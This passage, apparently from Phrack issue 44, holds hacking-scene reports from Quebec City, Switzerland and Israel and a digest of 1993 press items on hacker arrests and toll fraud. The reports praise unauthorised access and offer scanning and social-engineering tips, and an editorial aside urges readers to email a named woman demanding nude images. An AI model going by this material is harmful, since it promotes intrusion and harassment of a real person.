  18317. further unite the communities in various countries by shedding light
  18318. onto the hacking scenes that exist there.  We have been requesting files
  18319. from people to describe the hacking scene in their country, but
  18320. unfortunately, more people volunteered than followed through (you know
  18321. who you are.)  This issue we want to introduce you to the scenes in
  18322. Quebec, Sweden and Israel.
  18323.  
  18324. *******************************************************************************
  18325.  
  18326.                   What is going on in the 418 scene
  18327.                       By Gurney Halleck of NPC
  18328.  
  18329.  
  18330.         Believe it or not, there are hackers and phreakers in the 418 AC and
  18331. people are just starting to hear from us.  There are only two real H/P BBS in
  18332. Quebec City, The Workshop and Miranda BBS.  The first one is a NPC hang out
  18333. (Northern Phun Co.), a local Hacker/Phreaker group that has a certain fame,
  18334. just read Phone Pirates, a recent book by two Toronto journalists....
  18335. The other one is considered a little bit lame by some.  Personally, I am
  18336. friends with the sysops, they're not real hackers, but generally nice guys.
  18337.  
  18338.         Here are some names you might have seen in the H/P scene, Blizkreig,
  18339. SubHuman Punisher, KERMIT, Atreid Bevatron, Coaxial Karma, Mental Floss,
  18340. Fairy Dust, Evil-E, Black Head, Santa Claus, Blue Angel Dream, myself of course
  18341. and probably many more I have forgotten to mention.  (sorry)
  18342.  
  18343.         NPC Publishes a monthly magazine and will be celebrating their first
  18344. anniversary on November 1st 1993.  They have been on national TV and press for
  18345. breaking into the computer of the prime minister's cabinet.
  18346.  
  18347.         In 418, there is only one Internet Node, at Laval University, and to
  18348. get a legal account on one of their systems, be ready to shell out 90$ a month.
  18349. No kid can pay that much, so that's why there are so many hackers.  They hack
  18350. anything from old VAX/VMS machines to brand new Suns and Datapac and Edupac.
  18351.  
  18352.         Back in April of 1993, a hacker, Coaxial Karma, was arrested for trying
  18353. to "brute force" into saphir.ulaval.ca, a cluster VAX/VMS.  He was working from
  18354. information from another hacker, myself, that there were many "virgin" accounts
  18355. (account that were issued but never used) and that these accounts all had a
  18356. four letter (just letters) password.  So he proceeded to brute force the
  18357. computer, after 72000 tries, he finally got in.  An operator, entirely by
  18358. chance, found the logs for the 72000 failed logins for one account on saphir,
  18359. an proceeded to call the police.  The hacker, being a juvenile, got by easily,
  18360. not even loosing his computer.
  18361.  
  18362.         On September 30th, another hacker, SubHuman Punisher, was arrested
  18363. by the RCMP.  It all started a long time ago, when people started hacking
  18364. into Laval University's systems.   First, they installed a password on their
  18365. terminal servers, just one password, the same for everybody!  Needless to say,
  18366. everybody knew it.  Second, most sys-admins knew next to nothing about
  18367. security, so when they found intruders, they could not keep them out.
  18368. Enter Jocelyn Picard, sysadmin of the GEL subdomain and security expert.
  18369. He does his job and does it well.  He kicked them out for a long time.
  18370. (I personally do not think it was his idea to call the RCMP.)
  18371.  
  18372.         After a while, the hackers where back with a vengeance and using
  18373. Laval's systems to hack other systems.  So the guys from the CTI (Centre
  18374. de Traitement de l'Information) decided to call the authorities.  Bell
  18375. monitored the phone lines from Sept 16th to Sept 30th.  Systems in the ERE
  18376. hierarchy in the umontreal.ca domain were also logged for Internet activity.
  18377. On the 30th, 2 hackers where arrested.  Both of them, their only crime
  18378. was wanting to be on the internet.  Now is that so bad?
  18379.  
  18380.         I only knew one of the two, SubHuman Punisher, so I'll tell you what
  18381. happened to him.  He was charged with theft of telecomunications (that charge
  18382. has been dropped) and for illegally using a computer.  A new charge as been
  18383. added after they drop the first one: copyright infringement.  All his
  18384. equipment was taken away.  We don't think he'll get by as easily as the first
  18385. electronic martyr of 418 (as we like to call him).  This time it looks serious.
  18386. So we at NPC have started a relief fund for his legal defense, The "Fond de
  18387. Defense SubHuman Punisher" ( the SubHuman Punisher defense fund).
  18388.  
  18389. All contributions are welcomed, write to:
  18390.  
  18391.         FDSP
  18392.         886 St-Vallier St. app 7
  18393.         Quebec City, Qc
  18394.         Canada, G1K 3R4
  18395.  
  18396. *******************************************************************************
  18397.  
  18398.                               The Swiss Scene
  18399.                                   by Holz
  18400.  
  18401.  
  18402. Welcome to Switzerland, the country that's famous for, ehmm err, well now
  18403. famous for... come to think of it....nothing really.
  18404.  
  18405. Well, for those of you that didn't pay much attention at high school:
  18406. Switzerland is a rather unimportant country (to anyone but the Swiss) in
  18407. the middle of Europe with about 7*10^6 inhabitants and some light industry.
  18408.  
  18409. Networks in Switzerland
  18410. -----------------------
  18411. Switzerland has two internet providers, SWITCH and CHUUG. Lets deal with them
  18412. in that order. SWITCH was originally formed from a consortium of the 9 (?)
  18413. or so universities in Switzerland. It's purpose was linking the universities
  18414. in Switzerland and providing access to international networks for their
  18415. researchers. SWITCH is linked to the nfsnet via CERN (the European center
  18416. for nuclear research in Geneva) and INRIA in France. SWITCH's Customers
  18417. are almost exclusively universities or large corporations, they don't cater
  18418. much to individuals. Most of the Network operates at 2..10 Mb/sec, SWITCH uses
  18419. cisco hardware.
  18420.  
  18421. The other provider, CHUUG, founded by Simon Poole does cater to individuals
  18422. (they offer some for of pub access unix, + slip + uucp/news/mail feed), their
  18423. links, which last time I looked went via Germany and Holland are somewhat
  18424. slower. CHUUG also links some smaller companies (improware for instance)
  18425. Apart from the Swiss Internet, there is a DECNET based Network called CHADNET,
  18426. managed by SWITCH which also links the Swiss universities. There is even a
  18427. gateway to HEPNET and SPAN at the Paul Schaerrer Institute (PSI) in Zuerich.
  18428. Due to the restrictions in DECNET you need to use poor man's routing to get
  18429. anywhere.
  18430.  
  18431. Some of the universities have non ip internal networks, the most notable
  18432. being KOMETH, which links the university of Zuerich and the ETHZ, most
  18433. universities however just use their ethernets and don't have any fancy hardware.
  18434. Apart from this Switzerland has it's own PDN, Telepac, operated by the Swiss
  18435. Ptt (our federal telecommunications agency) with dnic 2284. This network
  18436. is accessible at speeds of up to 9600 bps at a fixed charge all over the
  18437. country. Apart from Telepac their are several other x25 based networks
  18438. directly accessible from Switzerland, notable Sprintnet, with dialins in
  18439. Zuerich and Bern, Tymnet with Dialins in Zuerich and Neuchatel, and Infonet.
  18440. Last but not least Switzerland has a national vtx system (which i've never
  18441. used, and i'm proud of that) called Videotext, which is linked to BTX in
  18442. Germany, Prestel in England and Minitel in France. The only reason for using
  18443. was the fact that up till recently it could be accessed for free via our
  18444. equivalent of the 1-800 number (ours start with 155). The ptt now claims that
  18445. this was a "mistake" (some mistake considering it lasted for two years and
  18446. was used by everyone and his dog.....but I digress.)
  18447.  
  18448. Hacking in Switzerland
  18449. ----------------------
  18450. Well there's not much of a scene here. I have known a few (5-10) Swiss hackers
  18451. and one or two good ones, but that doesn't go very far. As for boards, I can't
  18452. think of any right now. BGB (with nua 0208046451064) used to have a hacker
  18453. corner, but that's been closed for some years now I think. Pegasus
  18454. (022847521257) which runs on a vax under vms is quite a nice system, where on
  18455. occasion you meet people with an interest in vms.
  18456.  
  18457. I don't know of any conventions in Switzerland, we've tried to organize one
  18458. once (we ended up with three people). Hacking incidentally is illegal in
  18459. Switzerland, but only as of this year.
  18460.  
  18461. Phreaking in Switzerland
  18462. ------------------------
  18463. I don't know much about Phreaking (anything ?). The Swiss telephone system
  18464. is a very modern one, and nearly identical to the one in Sweden. This means
  18465. that any of the old methods suitable for older exchanges (most notable blue
  18466. boxing) don't work. There are some limited possibilities via our 1-800
  18467. system, but Switzerland phone systems aren't easily abused. The switches
  18468. incidentally are Siemens AX-10 (does that meen anything to anybody ?)
  18469. I know of one or two good phreaks (rather than card abusers) in Switzerland.
  18470. Phreaking and any messing with telephones, unlike hacking, has always been
  18471. illegal in Switzerland.
  18472.  
  18473. Some Incidents
  18474. --------------
  18475. Well here's for old times sake. (doubt this can do any harm any more)
  18476.  
  18477. 1)
  18478. I've already mentioned the Swiss X.25 Network Telepac. To use this you need
  18479. a nui, which is usually an 8 character string, and a password, which is six
  18480. characters, mixed upper and lower case + usually numbers. Well obviously
  18481. the ptt has nuis for internal use, as in this case the one for the employees
  18482. of the ptt headquarters in Bern. The nui it seems was available to all the
  18483. employees needing access and someone let the secret get out... so for two
  18484. years every hacker in Switzerland used this nui to make x25 calls round the
  18485. world. In fact it became so popular that the German hackers near the border
  18486. found it worth their while to pay the ld charges to Switzerland just so they
  18487. could use this nui. Eventually someone noticed. The cost must have been
  18488. phenomenal.
  18489.  
  18490. 2)
  18491. An acquaintance got into the Vax cluster of BAG (our equivalent to NIH).
  18492. The people at BAG eventually noticed and kicked him out. In their press
  18493. release to the incident, while being forced to admit that someone had got
  18494. in they made a firm point of how 'secure' they were, and explained that it
  18495. was impossible that anyone had seen any personal data on People registered
  18496. as HIV positive. Well this was such an obvious cover-up that my acquaintance
  18497. decided to give them a piece of his mind, so he called the national radio,
  18498. and gave them an interview live on his motives and accomplishments.
  18499. BAG continued to deny his version (but changed all their passwords.)
  18500.  
  18501. *******************************************************************************
  18502.  
  18503.                            The Israeli Scene
  18504.  
  18505.                                    by
  18506.  
  18507.                                Herd Beast
  18508.  
  18509.  
  18510.       Didn't you always want to know about the "scene" in Israel?
  18511.                                  YOU WILL...
  18512.  
  18513. A SMALL OVERVIEW
  18514. ****************
  18515.  
  18516. This article was written after I read Phracks 42/43, and the idea seemed
  18517. good.  I am not affiliated with any person or any group mentioned
  18518. in this file.
  18519.  
  18520. It's hard to describe the "Israeli scene", so I will start with a short
  18521. description of the state of technology in Israel.
  18522.  
  18523. TECHNOLOGY
  18524. **********
  18525.  
  18526. The Israeli telephone system isn't very advanced.  Most of the country
  18527. still doesn't even have tone dialing, and while the phone company has
  18528. rAd plans about installing CLID and a pack full of other exciting things,
  18529. the fact remains that half the country breathes rotary phones and analog
  18530. lines.  Pathetic as it seems, it still means that tracing someone through
  18531. the phone lines can be rather hard; it also means that K0D3 scanning is
  18532. abundant.
  18533.  
  18534. After the telephones comes the X.25 connection, Isranet: DNIC 4251.
  18535. Isranet used to be a "hassle free system", eg every 11 year old could
  18536. get a NUI and use it, and NUIs lasted.  Those merry times in which
  18537. practically everyone who had a modem was an X.25 "hacker" are almost
  18538. over.  The weakness of Isranet (the telco's fault!) is why if you happened
  18539. upon QSD some years ago, you would have probably noticed that after Italian
  18540. lesbians, Israelis lurked there the most.  Recently, Isranet switched
  18541. systems.  The old system that just prompted NUI? and ADD? is gone, and
  18542. in came the SprintNet (Telenet) system.  It is now generally believed
  18543. that Isranet is un-crackable.  Way to go, Sprint, ahem.
  18544.  
  18545. Amongst other thing the Israeli phone company supplies besides an X.25
  18546. network is an information service (like 411) through modem, e-mail/FAX
  18547. and database systems (a branch of AT&T EasyLink) and a bunch of other things.
  18548. Not to forget the usual "alien" connections, like a TYMUSA connection
  18549. (with very low access levels), and toll free numbers to the AT&T USA*Direct
  18550. service and sexy-sounding MCI & Sprint operators.
  18551.  
  18552. To my knowledge, cellular telephony among phreaks in Israel is virtually
  18553. non existent, (that is to say, when talking to phreaks, none of them seems
  18554. to care about cellular phones at all, for different reasons one of them
  18555. being the starting price which is high), which is a pity but is also a
  18556. blessing since security is lax and besides, the Israeli cell phone market
  18557. is monopolized by Motorola (whose cell phones re known as "Pele Phones"
  18558. which means "Wonder Phones").
  18559.  
  18560. As you might have understood, up until lately, the Israeli phone company
  18561. (Bezeq) wasn't very aware of security and boring stuff like that.  Now
  18562. it's becoming increasingly aware, although not quite enough.  The notion
  18563. in Israel is that hackers are like computer geniuses who can get into
  18564. ANYWHERE, and when last did you see someone like that?  So basically,
  18565. corporate security is lax (does "unpassworded superuser account" ring a
  18566. bell?), although not always that lax.
  18567.  
  18568. Last but not least are the elytee -- the computer literate public.
  18569. These are most of the people in charge of machines on the *.il domain on
  18570. the Internet.  Security there is better than usual, with (for example)
  18571. "correct password" rules being observed, but (another example) with holes
  18572. like /usr/lib/expreserve on SunOS still open.  For this reason, there is a
  18573. difference between hackers in Israel.  There are university students who
  18574. play around with the Internet, hack, and are usually not aware that
  18575. there is a bigger hacking community beyond IRC.  Then, there are the
  18576. modemers, who use modems and all the other things, but are generally not
  18577. as proficient, since Internet access in Israel is given only to
  18578. university people and employees of the very few companies who have
  18579. Internet connections.  (The notion of public access Unix exists, but
  18580. access costs $50 a month and to get it one must have approval of the
  18581. ministry of communication because of an old law; and since calling up a
  18582. system and running by all the defaults usually does not work, not
  18583. everyone has access to the Internet.)
  18584.  
  18585. Calling card abuse is very popular in Israel, because Bezeq cannot find
  18586. abusers and really doesn't care.  Therefore there are a lot of pirates
  18587. in Israel who are in very good touch with American pirate groups, and
  18588. this includes the works - crackers, artist, couriers.  If you know a bit
  18589. about the pirate community, good for you.
  18590.  
  18591. Hackers as in computer hackers are a little rarer.  To become a hacker you
  18592. need to pass some grueling tests.  First, you resist the lures of becoming a
  18593. calling card and download junkie.  Then, you have to become proficient
  18594. from nothing.  Finally most of the Israeli hacking community
  18595. hacks for the single reason that goes something like "get into QSD",
  18596. "get into IRC" (without paying).  Not very idealistic, but it works...
  18597.  
  18598. Assuming you passed all these stages, let's say you are 18... and you go
  18599. to 3 years in the army.  Did I forget to mention that serving in the
  18600. army is mandatory in Israel?  Not really relevant, but that's life in
  18601. Israel, and when you leave the army, you usually forget about hacking.
  18602.  
  18603. Up until now I was just explaining things.  Now..
  18604.  
  18605. THE PARTICULARS
  18606. ***************
  18607.  
  18608. I will concentrate on the "modemers" in this section, so first about the
  18609. students.  You may know this, but there is a lot of "bad" Internet
  18610. traffic on *.il, in the form of pirate/virus FTPs and stuff like that.
  18611. If you read Usenet, you probably saw at some time a wise ass post such a
  18612. site.  These are usually the works of students.  To be honest, that's as
  18613. much as I know, since I'm not a student and my stupidity is not so high
  18614. as to assume every Internet user from *.il is a student...
  18615.  
  18616. The "serious" modemers hackers don't really hang out in big groups.
  18617. They have close friends or work alone, so there is nothing like Israeli
  18618. ######Cons.  I can't make an estimate of the actual amount of hacking
  18619. done in Israel, but I do know that a lot of people got drafted lately.
  18620. Other than that, there are a lot of Israelis hanging around on IRC (if
  18621. you're into that), but they usually work like k0D3 k0ll3kt0rZ, only
  18622. instead of codes they collect Unix account.
  18623.  
  18624. In a country that has fewer people than NYC, the total number of
  18625. people who actually have modems and do hack AND know what they're doing
  18626. is not so large, which is why until now my description didn't sound very
  18627. pretty.  But considering these facts, they're actually not bad.
  18628.  
  18629. There are some "underground" groups in Israel.  Not exactly groups as
  18630. magazines -- if there is one thing Israel is full of it's local
  18631. magazines.  These are usually small releases featuring things like "FTP
  18632. Tutorial" and "Pascal Trojan" along with several oh-so-accurate anarchy
  18633. files.  The most prominent, and in the fact the only magazine to have
  18634. lasted beyond one issue is called IRA (International Raging Anarchists).
  18635.  
  18636. For the sake of the pirates, an Israeli formed group that also has
  18637. American members is called HaSP; it usually releases cracks for all
  18638. kinds of software.
  18639.  
  18640. THE NETWORK
  18641. ***********
  18642.  
  18643. Some time ago there was an attempt to bring up a hacking network in
  18644. Israel.  It was called the IHPG (Israeli Hack Phreak Group) and was
  18645. a bunch of FidoNet-style echos passed between underground boards.  The
  18646. subjects on hand were hacking, phreaking, trojans, and viruses.  At first
  18647. there was a genuine attempt to make things happen, but almost no one shared
  18648. information (more accurately, accounts/passwords/codes) and the net
  18649. slowly died out.  To my information it is still operational on around 3
  18650. boards around Israel, with something like 3 posts per month.
  18651.  
  18652. LAW AND ORDER
  18653. *************
  18654.  
  18655. The law and the establishment in Israel are divided.  For starters,
  18656. there is the wide public opinion among the public that every hacker, in
  18657. particular those who get caught are computer geniuses.  Therefore, in a
  18658. lot of cases where hackers (usually university students) get caught, they
  18659. are given a better position within the computer staff, or are later hired
  18660. by a company (no matter what for -- and it's not always security).
  18661. Although police and Bezeq do preach that hacking is a crime etc, I seriously
  18662. doubt that there will be such an outrage among computer people if someone
  18663. was to go on and build an Israeli ComSec (as an example).
  18664.  
  18665. Police has a very limited staff assigned to computer investigations,
  18666. (along the lines of 1-2 officers), and they are in charge of everything;
  18667. this means they should check calling carders, but also on bank
  18668. embezzlers who keep information on "secure" floppies.  Guess which cases
  18669. get priority?  Of course, there is still the phone company and when
  18670. things get more serious more man force is issued.
  18671.  
  18672. >From time to time, however, there are arrests (see PWN on Phrack 35,
  18673. 38 elsewhere).  These usually involve (in the case of the guy described on
  18674. Phrack 35) a tip from police overseas, who kept bugging the Israeli
  18675. police until they made a move, or idiots who sell things.  The guy in
  18676. the Phrack 35 World News, Deri Schreibman, was arrested after he
  18677. supplied credit cards to people in the U.S. and Canada, who turned him
  18678. in when they got caught.  He himself turned in a lot of people, but his
  18679. information "just" led to them being visited.  Nothing much has been
  18680. heard about that since, but his case got a lot of publicity because he
  18681. had a lot of computer equipment, including this/that-boxes, and was
  18682. said to have broken in Washington Post and the Pentagon.  After him,
  18683. there have been raids on hackers but nothing serious happened to them,
  18684. and the news coverage was not incredible.  A year or so ago one total asshole
  18685. went on a national show (nothing like Geraldo) and told everyone how he too,
  18686. abused Isranet and the Washington Post; he also claimed that Bezeq
  18687. didn't have a clue and that was why he wasn't afraid.   He was visited and
  18688. his equipment was taken.  At much earlier times there was a teenager who
  18689. changed an article on the last page on an Israeli newspaper to say that his
  18690. math teacher had been arrested for drug dealing; he got to write a computer
  18691. program to aid blind and deaf people.  That is the general way busts go on
  18692. in Israel, because there is no such great danger as to even warrant dreams
  18693. of something like Sundevil.  There are also sometimes problems in the army,
  18694. but they are dealt with internally, by the army (I don't think anyone
  18695. gets shot though).
  18696.  
  18697. When a bust occurred, usually many people quit fooling around with
  18698. Isranet for a while, because all those who did get caught were doing the
  18699. same things with Isranet.  But except for that, there were no great
  18700. waves in the pond after busts, except again for the Deri S. case.  This
  18701. is due simply to the fact that hackers, in Israel and usually anywhere
  18702. else, simply don't amount to the amount of problems "professional"
  18703. criminals make to the police, (the same way Israeli software houses chase
  18704. down pirating firms and not boards), and since Israel doesn't have an
  18705. FBI and/or USSS the law isn't going around pointing guns at hackers.
  18706.  
  18707. HACKING IN ISRAEL
  18708. *****************
  18709.  
  18710. Hacking or phreaking in Israel in not very sophisticated.  The average
  18711. Israeli can scan all he likes; Israeli toll free numbers in the format of
  18712. 177+Country Code+XXXX exist to almost every country.  This means that by
  18713. dialing 177 (= 1-800), a country code (440 for the UK, 100 for AT&T, 150
  18714. for MCI, etc), and a number on the XXXX format, you have a chance of
  18715. connecting to a number in country whose country code you're using.
  18716. Voice mail systems, modems and other things can be found there
  18717. (h00ray!).
  18718.  
  18719. There are also calling cards and X.25 and 056 (= 1-900) scams, etc, etc.
  18720.  
  18721. A nice way to start scanning (if anyone is interested) the 4251 DNIC is
  18722. based on area codes (yes, just like Telenet).  For example, a lot of
  18723. systems in the 04 area code will be somewhere at: 4251 400 ...  This
  18724. might lead to disappointing results, though, since most systems use Hebrew
  18725. (most interesting systems).  The best way to get Israeli area codes is by
  18726. using a file on international country/area codes put out a while ago...
  18727. Funny, but it's more accurate than a C&P phone book.
  18728.  
  18729. If you're into social engineering foreigners, give 1 800 477-5664 (AT&T)
  18730. or 1 800 477-2354 (MCI) a call.  These will get you to an Israeli
  18731. operator who will be happy to place a call for you, if you're into
  18732. experimenting (another one of Bezeq's new services, called
  18733. Israel*Direct... also available from the UK, Ireland, Germany and more.)
  18734.  
  18735. CONCLUSION
  18736. **********
  18737.  
  18738. I hope you have learned about the Israeli scene.  My purpose was NOT to
  18739. dis anything, it was to show that even though we live in this
  18740. global village of networks and electronic data exchange (ohh), living in
  18741. outer butt-fuck (I did not invent this term) has its advantages, in the
  18742. form of basic stupidity, and its disadvantages in the form of lack of
  18743. technology and organization in the community.  Yeah.
  18744.  
  18745. There are still many nice things about hacking in Israel.  Enjoy your life.
  18746.                               ==Phrack Magazine==
  18747.  
  18748.                  Volume Four, Issue Forty-Four, File 27 of 27
  18749.  
  18750.               PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
  18751.               PWN                                             PWN
  18752.               PWN              Phrack World News              PWN
  18753.               PWN                                             PWN
  18754.               PWN        Compiled by Datastream Cowboy        PWN
  18755.               PWN                                             PWN
  18756.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  18757.  
  18758.  
  18759. Feds Pull The Plug On Phiber Optik                             November 4, 1993
  18760. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18761. by Joshua Quitner (Newsday) (Page 57)
  18762.  
  18763. The biggest case of computer intrusion in US history drew to a close yesterday
  18764. when a young Elmhurst, Queens, man was sentenced to a year and a day in jail
  18765. for his part in an electronic gang that, for years, roamed the nation's
  18766. largest telephone and data networks.
  18767.  
  18768. Mark Abene, 21, renowned in the digital underground as Phiber Optik, was the
  18769. last of five young New York City men to plead guilty in federal court to one
  18770. felony count of conspiracy for being in a hacker group known as MOD.
  18771.  
  18772. Abene apologized for his deeds yesterday.  "I'm just sorry they were
  18773. misconstrued as malicious in any way," he said in Manhattan's federal
  18774. district court.
  18775.  
  18776. Prosecutors claimed that the young men rumbled on computer networks,
  18777. disconnecting other hackers' phone service and posting embarrassing
  18778. information culled from confidential credit networks like TRW on
  18779. underground bulletin boards.  They also used their power skills to get
  18780. telephone numbers or credit reports for celebrities, including Julia
  18781. Roberts, John Gotti, Geraldo Rivera, Christina Applegate and Mad Magazine
  18782. founder William Gaines.
  18783.  
  18784. John Lee, 22, a co-defendant is now serving a one year sentence in a
  18785. "shock incarceration" boot camp in Lewisburg, PA.  Lee and Julio Fernandez,
  18786. 18, were the only gang members who made money from the two years of
  18787. break-ins.
  18788.  
  18789. In addition to Lee and Fernandez, Paul Stira, 23, of Cambria Heights,
  18790. Queens, and Elias Ladopoulos, 24, of Jamaica, Queens, are serving six-month
  18791. sentences in federal prisons in Pennsylvania.  Fernandez has been cooperating
  18792. with authorities and is not expected to be jailed.
  18793.  
  18794. -------------------------------------------------------------------------------
  18795.  
  18796. Computer Caper Is Unpluged
  18797. ~~~~~~~~~~~~~~~~~~~~~~~~~~                                      October 1, 1993
  18798. by Tim Bryant (St. Louis Dispatch) (Page A1)
  18799.  
  18800. Investigators said 18-year-old computer hacker Paul J. Gray of Creve Coeur,
  18801. MO, was arrested on a state charge of tampering with computer data, a
  18802. misdemeanor.  The college freshman reportedly used his home computer to
  18803. spy electronically on files of a federal appeals court and charge
  18804. long-distance telephone calls to Mercantile Bank
  18805.  
  18806. -------------------------------------------------------------------------------
  18807.  
  18808. Teen Hacker Admits Having Illegal Credit Information              June 17, 1993
  18809. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18810. by James McClear (Detroit News) (Page B7)
  18811.  
  18812. Ander Monson, 18, of Houghton, MI, whose electronic misadventures uploaded
  18813. him into the high-tech world of computer fraud, pleaded guilty in Oakland
  18814. County Probate Court to illegal possession of credit card information.
  18815.  
  18816. -------------------------------------------------------------------------------
  18817.  
  18818. In The Jungle Of MUD                                         September 13, 1993
  18819. ~~~~~~~~~~~~~~~~~~~~
  18820. by Ellen Germain (Time) (Page 61)
  18821.  
  18822. Virtual worlds you can hook into--and get hooked on--are the latest
  18823. rage on the computer networks.
  18824.  
  18825. [Ah, yes, Virtual Reality as perceived through the minds of the computer
  18826. illiterate.  But wait, it's electronic crack!  Keep an eye out for your
  18827. children!]
  18828.  
  18829. -------------------------------------------------------------------------------
  18830.  
  18831. NCIC Abuse - Is Legislation The Answer                            October, 1993
  18832. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18833. by Brian Miller
  18834.  
  18835. Confidential information is being illegally released from the National
  18836. Crime Information Center network.  But abuse of the system is difficult
  18837. to detect, and those caught are seldom punished.
  18838.  
  18839. A former law enforcement officer tracked town his ex-girlfriend with
  18840. information from an FBI-run law enforcement information system.  Then
  18841. he killed her.
  18842.  
  18843. A terminal operator in Pennsylvania used the same system to conduct
  18844. background searches for her drug dealing boyfriend to see if his customers
  18845. were undercover agents.
  18846.  
  18847. It is hard to trace abuse to a single user because many agencies don't
  18848. require personal access codes which would keep track of who made specific
  18849. inquiries on the system and when they occurred.  The General Accounting
  18850. Office polled all the states and found that 17 don't require a personal
  18851. code to access the NCIC.  Most of these had an identifier only for the
  18852. terminal or agency accessing the system.
  18853.  
  18854. And if someone is caught abusing the system, they are seldom charged with
  18855. a crime.  The GAO found that the most common penalty was a reprimand, with
  18856. some suspensions and firings.  Of the 56 cases of abuse found by the GAO,
  18857. only seven people were prosecuted.
  18858.  
  18859. The FBI cannot force the states to adopt certain security measures
  18860. because compliance with the guidelines is voluntary.  The reason for this is
  18861. that the guts of the NCIC come from the states, and the FBI simply
  18862. maintains the network.
  18863.  
  18864. "The main thing that can be done today is to enforce the law, and create
  18865. stronger penalties for abusing the system," said Marc Rotenbertg of
  18866. Computer Professionals for Social Responsibility, an advocacy group
  18867. based in Palo Alto, California.
  18868.  
  18869. -------------------------------------------------------------------------------
  18870.  
  18871. Live Wires                                                    September 6, 1993
  18872. ~~~~~~~~~~
  18873. by Barbara Kantrowitz et.al. (Time) (Page 63)
  18874. &
  18875. Technoid Circus
  18876. ~~~~~~~~~~~~~~~
  18877. by Rex Weiner (Spin) (Page 72)                                  September, 1993
  18878.  
  18879. [K-K00l cYbUR P|_|n|< aRt1Cl3zzzz
  18880.  
  18881.  Jump On The Cyber Bandwagon!
  18882.  
  18883.  More Journalists ride that old info highway straight to HELL!]
  18884.  
  18885.  
  18886. ** BUT WAIT!  A "Cyber" article we can all dig! **
  18887.  
  18888. Speciale Cyber                                                  Settembre, 1993
  18889. ~~~~~~~~~~~~~~
  18890. di Sergio Stingo (King) (P. 131)
  18891.  
  18892. Il cyberpunk:  tutti ne parlano, ma pochi sanno cosa sia veramente.  Libri
  18893. elettronici?  Scenari inquietanti del futuro prossimo venturo?  Conferenze
  18894. telematiche?  Nuovi tipi di abbigliamento usa-e-getta?  La piu' grande
  18895. rivoluzione democratica dei nostri anni?  Una rivoluzione strisciante e
  18896. silenziosa?  Ia nostro stingo, sempre curioso del <<nuovo>>, S'e' messo
  18897. a girare l'italia per iundagare il fenomeno.  E' stato come scoperchiare
  18898. una pentola in ebollizione.  Piu' incontrava <<cyber>> e piu' scopriva che
  18899. c'era da scoprire.  Dal teorico della <<brain machine>>, che sperimenta
  18900. l'oggetto misterioso tra discoteche e universita', alla prima galleria
  18901. dove sono esposte opere di hacker art.  Dalle riviste-bandiera del cyber,
  18902. come <<decoder>>, alle band che stanno inventando una nuova musica.  Per non
  18903. parlare del sesso, che grazie alla tecnologia cerca di ampliare la
  18904. gamma delle sensazioni possibili.  Insomma, il viaggio oltre i confini di
  18905. questo mondo e' stato talmente ricco e avventuroso, che abbiamo dovuto
  18906. suddividere il reportage in due puntate.  In questo numero presentiamo
  18907. la prima.  E, come si dice tra cybernauti, buona navigazione.
  18908.  
  18909. [I don't know what that says, but its in another language, so it has to
  18910.  be cooler than the American CyberCrap]
  18911.  
  18912. -------------------------------------------------------------------------------
  18913.  
  18914. Security Products Abound, But Is Toll Fraud Too Tough?          August 30, 1993
  18915. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18916. by Dan O'Shea (Telephony) (Page 7)
  18917.  
  18918. Telecommunications toll fraud is an increasingly popular crime that
  18919. collectively costs its victims billions of dollars each year.  Although
  18920. carriers have responded with a wave of security products and services,
  18921. the problem might be much bigger than was once thought.
  18922.  
  18923. Some carriers claim that industry wide toll fraud losses amount to between
  18924. $2 billion and $5 billion a year, but the true figure is closer to $8 billion,
  18925. according to Bernie Milligan, president of CTF Specialists Inc.,
  18926. a consulting group that studies toll fraud and markets security services to
  18927. large corporate telecommunications users.  [ed: remember HoHo Con?  Yes...THAT
  18928. Bernie]
  18929.  
  18930. Toll fraud involving calls coming into AT&T's 800 network dropped 75% since
  18931. the introduction of NetProtect, while Sprint estimates a 95% decrease from
  18932. last year (since the introduction of their fraud detection service).  Average
  18933. losses across the industry have plummeted from $120,000 per incident to
  18934. $45,000.
  18935.  
  18936. Despite the offensive against telecom fraud, the problem persists and is
  18937. becoming more frequent, and new technologies will only represent potential
  18938. new adventures for hackers, CFT's Milligan said.  Hacker activity is growing
  18939. at an annual rate of 35%.  Some 65% to 80% of toll fraud involves
  18940. international calling, and fraud occurs on a much wider scale than just
  18941. inbound 800 calls, Milligan said.  So, while losses of this type of fraud
  18942. drop, collective fraud losses are increasing by 25% each year.  Customers
  18943. are still liable financially in toll fraud cases, and the carriers continue
  18944. to get paid.
  18945.  
  18946. -------------------------------------------------------------------------------
  18947.  
  18948. Misfit Millionaires                                              December, 1993
  18949. ~~~~~~~~~~~~~~~~~~~
  18950. by Steve Fishman (Details) (Page 158)
  18951.  
  18952. [Author profiles several of the early Microsoft programmers, namely
  18953.  Richard Brodie, Jabe Blumenthal, Kevin DeGraaf, Neil Konzen and Doug
  18954.   Klunder]
  18955.  
  18956. -------------------------------------------------------------------------------
  18957.  
  18958. Intercourse With Lisa Palac                                                1993
  18959. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18960. by Melissa Plotsky (Axcess) (Page 62)
  18961. &
  18962. Turned On By Technology In The World Of Cybersex                August 30, 1993
  18963. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  18964. by Marco R. della Cava (USA Today) (Page 4D)
  18965.  
  18966. [An interview and an overview dealing with online nastiness.  Lisa Palac
  18967.  editor of Future Sex and producer of Cyborgasm talks about all kinds of
  18968.  stuff.  As a regular peruser of Future Sex (for the articles of course)
  18969.  I can't help but wonder why we haven't seen HER naked yet.  Email
  18970.  her at futursex@well.sf.ca.us and demand some gifs.]
  18971.  
  18972. -------------------------------------------------------------------------------
  18973.  
  18974. Don't Try This At Home
  18975. ~~~~~~~~~~~~~~~~~~~~~~                                             August, 1993
  18976. (Compute) (Page 62)
  18977.  
  18978. Welcome to desktop forgery.
  18979.  
  18980. Susan Morton, senior forensic document examiner with the US Postal Service
  18981. in San Francisco, has seen gangs travelling the country packing computers,
  18982. scanners, and laser printers.  Arriving in town, their first move is to rob
